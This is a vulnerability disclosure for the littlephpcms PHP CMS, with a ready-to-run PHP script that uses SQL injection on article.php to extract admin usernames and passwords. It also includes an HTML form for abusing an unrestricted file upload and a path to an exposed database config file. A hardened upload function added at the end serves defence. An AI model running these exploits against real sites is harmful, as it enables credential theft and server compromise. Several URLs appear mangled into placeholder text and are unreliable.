
littlephpcms: multiple injection, upload, and information disclosure vulnerabilities and fixes

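Brief description:

// pageArt.php
// ... omitted
$column = $_POST["column"];
$rownum = $_POST["rownum"];
// User-controlled $column is concatenated into the SQL string unquoted and unescaped
$sql = " select id,title,addtime from lpc_article where column_id=".$column;
// ... omitted

Other similar files: omitted.

Exp: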

<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
Sql injection Vul Exploit

Exp :黑小子 cfking
Home: [url]HdhCmsTest2cto测试数据 [/url] [url]HdhCmsTestwebvul测试数据[/url]
2011.09.20
+---------------------------------------------------------------------+
');

if ($argc < 2) {
    print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' [url]HdhCmsTest2cto测试数据 [/url] test
');
    die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
    $headers .= "$str\n";
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
    preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
    $result=explode("-",$arr[1]);
    print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
} else{
    print_r("Exploit Failed! \n");
}

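File upload:

Vulnerable files:
admin/column/upload.php
admin/article/upload.php

$upload_dir = 'uploads/';
// The client-supplied file name is used as-is in the destination path
$file_path = $upload_dir . $_FILES['myfile']['name'];
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
// ......
// "The uploaded file exceeds the size limit" (message only; execution continues)
if($_FILES['myfile']['size']>$MAX_SIZE)
    echo "上传的文件大小超过了规定大小";
// "Please choose a file to upload"
if($_FILES['myfile']['size'] == 0)
    echo "请选择上传的文件";
// "Copying the file failed, please upload again"
if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))
    echo "复制文件失败,请重新上传";

Neither file applies any restriction!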

Exp:  

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action=" http://HdhCmsTest2cto测试数据 /admin/column/upload.php" method="post">
<!-- After upload the file is at [web root]/uploads/[name of the uploaded file] -->
<p>上传后网站跟目录/uploads/你上传的文件名<p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>
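A hardened form of the upload handling quoted above, as an added example (it is not littlephpcms code and not a fix from the original author). It assumes image-only uploads, a 2 MB limit, a storage directory outside the web root, and an admin session check done before this code runs; `store_upload`, `ALLOWED`, the `MAX_SIZE` value and the path `/var/lib/lpc_uploads` are names and values chosen here for illustration.

```php
<?php
// Added example, not littlephpcms code. Assumptions: image-only uploads,
// a 2 MB limit, and a storage directory outside the web root.
const MAX_SIZE = 2000000;
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_upload(array $file, string $uploadDir): string
{
    // Reject PHP-level upload errors (partial upload, no file, ini limit hit).
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Stop on a bad size; the original only echoed a message and carried on.
    if ($file['size'] <= 0 || $file['size'] > MAX_SIZE) {
        throw new RuntimeException('file size not allowed');
    }
    // Type comes from the file contents, not the client's name or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-generated name plus allow-listed extension: the client name
    // ($_FILES['myfile']['name']) never reaches the path, so "x.php" or "../"
    // in it has no effect. Content sniffing alone can be fooled by polyglot
    // files, which is why the extension is forced and the directory is not
    // served or executed by the web server.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($uploadDir, '/') . '/' . $name;
    // move_uploaded_file() refuses sources that are not genuine HTTP uploads.
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0640);
    return $name;
}

if (isset($_FILES['myfile'])) {
    try {
        // Hypothetical path; an authenticated admin session is assumed to
        // have been verified before this point.
        $stored = store_upload($_FILES['myfile'], '/var/lib/lpc_uploads');
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```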

Information disclosure:

http://HdhCmsTest2cto测试数据 /admin/lib/db/config.xml
